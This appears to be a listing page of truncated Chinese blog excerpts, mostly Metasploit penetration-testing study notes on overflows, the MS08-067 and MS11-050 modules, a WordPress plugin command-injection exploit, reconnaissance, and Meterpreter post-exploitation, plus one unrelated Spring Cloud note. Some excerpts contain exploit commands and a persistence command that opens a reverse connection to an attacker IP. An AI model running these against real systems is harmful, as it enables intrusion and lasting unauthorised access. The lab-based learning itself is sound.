1.内存攻防技术 1.1缓冲区溢出漏洞机理 1.2栈溢出利用机理 1.3缓冲区溢出利用的限制条件 2.网络服务渗透攻击面 3. Windows服务渗透攻击实战案例——MS08-067安全漏洞 示例代码如下 msf > search ms08_067     在metasploit框架中查找ms08_06 netapi攻击模块 Matching Modules ================ Name                                 Disclosure Date…
三.网络服务渗透攻击 3.1 内存攻防技术      3.1.1 缓冲区溢出漏洞机理              缓冲区溢出是程序由于缺乏对缓冲区的边界条件检查而引起的一种异常行为.              一般根据缓冲区溢出的内存位置不同,将缓冲区溢出分为栈溢出和堆溢出.      3.1.2 栈溢出利用原理             栈溢出发生在向栈中写数据时,当数据长度超过栈分配的空间时,就会造成溢出.             ①覆盖函数返回地址利用方式                程序一…
网络服务渗透攻击分为三类 一.针对于windows系统自带的网络服务的渗透攻击 1.针对于NetBIOS的攻击 NetBIOS以运行在TCP/IP系统中的NBT协议来实现,具体包括在UDP的137端口上监听的NetBIOS名字的服务:UDP的138端口上的NetBIOS数据报服务:TCP的139,445端口的NetBIOS会话服务. 2.SMB网络服务 SMB(Server Message Block)提供了Windows网络中最常用的远程文件与打印共享服务,其次SMB的命名管道是MSRPC协议…
1.命令注入实例分析 对定V公司网站博客系统扫描可以发现,它们安装了zingiri-web-shop这个含有命令注入漏洞的插件,到www.exploit-db.com搜索,可以看到2011.11.13网站公布了php渗透代码. 把这个代码放到kali中,执行命令php 18111.php 10.10.10.129 /wordpress/成功得到目标主机Shell,并能执行相关命令 2.文件包含和文件上传漏洞 查看定V公司博客源代码可以发现后台使用了插件——1 Flash Gallery Word…
书364页配置假冒AP步骤,因为没有无线网卡,先跳过这个实验.…
SpringCloud学习笔记:服务支撑组件 服务支撑组件 在微服务的演进过程中,为了最大化利用微服务的优势,保障系统的高可用性,需要通过一些服务支撑组件来协助服务间有效的协作.各个服务支撑组件的原理可以参考我的之前一篇文章:微服务实践:服务治理. Spring Cloud提供的支持 Eureka:各个服务启动时,Eureka Client都会将服务注册到Eureka Server,并且Eureka Client还可以反过来从Eureka Server拉取注册表,从而知道其他服务在哪里. Rib…
1.浏览器渗透攻击实例——MS11-050安全漏洞 示例代码如下 msf > use windows/browser/ms11_050_mshtml_cobjectelement msf exploit(windows/browser/ms11_050_mshtml_cobjectelement) > info Name: MS11-050 IE mshtml!CObjectElement Use After Free Module: exploit/windows/browser/ms11_…
1.情报搜集 1.1外围信息搜索 1.1.1通过DNS和IP地址挖掘目标网络信息 (1)whois域名注冊信息查询(BT5.kali专有):root@kali:~# whois testfire.net  s (2)nslookup与dig域名查询(查询域名相应的IP地址):msf > nslookup > set type=A > testfire.net msf > dig 注:nslookup仅仅能得到DNS解析server保存在Cache中的非权威解答,dig则能够从该域名…
不多说,直接上干货! 连接后台的数据库,当然不是必须品. 连接数据库的好处:1.可以攻击和扫描的结果,保存起来      2.将一些搜索结果做个缓存 默认数据库是postgresql. 同时要注意的是:在kali linux系统中,不需再安装postgresql和mestasploit. 如果你用的是其他系统的话,有可能还需要下载安装. 查看 postgresql 是否启动,没有启动的话,使用 service postgresql start 命令启动.启动后查看是否启动成功,端口是 5432…
1. Meterpreter命令详解 1.1基本命令 使用Adobe阅读器渗透攻击实战案例打开的Meterpreter会话实验,靶机是WinXP.由于所有命令与书中显示一致,截图将书中命令记录下来. 1.2文件系统命令 1.3网络命令 1.4系统命令 2.后渗透攻击模块 2.1persistence后渗透攻击模块 示例代码如下 meterpreter > run persistence -X -i 5 -p 443 -r 10.10.10.128 [!] Meterpreter scripts…